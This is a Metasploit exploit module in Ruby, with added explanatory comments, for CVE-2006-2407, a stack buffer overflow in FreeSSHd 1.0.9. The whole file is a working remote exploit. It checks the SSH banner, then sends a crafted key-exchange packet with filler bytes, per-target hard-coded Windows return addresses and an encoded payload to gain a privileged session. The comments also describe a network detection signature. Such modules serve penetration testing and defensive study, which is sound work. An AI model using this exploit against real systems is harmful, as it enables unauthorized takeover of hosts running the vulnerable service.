Path: blob/master/modules/exploits/windows/ssh/freesshd_key_exchange.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2006-2407: a stack buffer overflow in FreeSSHd 1.0.9
# reached through an oversized key-exchange algorithm string from an SSH client.
# It sends a single crafted client banner plus KEXINIT-style packet and relies
# on a hard-coded, per-target return address ('Ret') to reach the payload;
# the AverageRanking reflects that dependence on fixed addresses.
# Names such as connect, sock, handler, disconnect, payload, target and
# rand_text_alphanumeric come from the Msf mixins, not from this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # Supplies connect/disconnect and the `sock` used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the RPORT option (default 22).
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
        'Description' => %q{
          This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.
          This flaw is due to a buffer overflow error when handling a specially
          crafted key exchange algorithm string received from an SSH client.
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2006-2407'],
          ['OSVDB', '25463'],
          ['BID', '17958'],
        ],
        # EXITFUNC 'process': the payload terminates the whole service process
        # when it finishes, so a successful run is not silent on the host.
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        # Payload constraints: at most 500 bytes, no NUL bytes, and the stack
        # pointer is moved 3500 bytes down before the payload executes.
        'Payload' => {
          'Space' => 500,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # 'Ret' is the absolute address written over the saved return address.
        # It is OS / service-pack / language specific; with a mismatched target
        # the overwritten return address will most likely crash the service.
        'Targets' => [
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
          [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e51877 } ],
          [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ],
        ],
        # A resulting session is expected to run with the service's privileges.
        'Privileged' => true,
        'DisclosureDate' => '2006-05-12',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(22)
      ]
    )
  end

  # Connects to RPORT, builds the overflow buffer, and sends it only if the
  # server banner matches the vulnerable "WeOnlyDo 1.2.7" library string.
  #
  # Layout of `sploit`, as far as the code makes it explicit:
  #   - client banner "SSH-2.0-OpenSSH_3.9p1" terminated by LF (0x0a)
  #   - binary packet header bytes; 0x14 is SSH_MSG_KEXINIT (20).
  #     NOTE(review): 00 00 4f 04 / 05 look like packet_length (20228) and
  #     padding_length fields; 18 NUL bytes then 0x07de look like the 16-byte
  #     KEXINIT cookie followed by a name-list length of 2014 — confirm
  #     against RFC 4253 before relying on this reading
  #   - 1055 alphanumeric filler bytes, then target.ret as a 32-bit
  #     little-endian word (pack('V')) at the saved-return-address slot
  #   - the encoded payload, 19000 bytes of alphanumeric padding, CRLF
  #
  # Detection note: a client announcing OpenSSH_3.9p1 and then sending a
  # roughly 20 KB KEXINIT is a usable network signature for this attack.
  def exploit
    connect

    # The whole buffer is assembled before the banner check, so nothing is
    # written to the socket unless the version match below succeeds.
    sploit = "SSH-2.0-OpenSSH_3.9p1"
    sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
    sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
    sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
    sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

    # 22 bytes is exactly the length of "SSH-2.0-WeOnlyDo 1.2.7", so a short
    # read or a different banner fails the match and the module reports
    # "not vulnerable" without sending anything. The regex is unanchored and
    # its dots are unescaped, so the version check is loose rather than exact.
    res = sock.recv(22)
    if (res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
      print_status("Trying target #{target.name}...")
      sock.put(sploit)
    else
      print_status("Not running a vulnerable version...")
    end

    # Start the payload handler, then close the exploit socket.
    handler
    disconnect
  end
end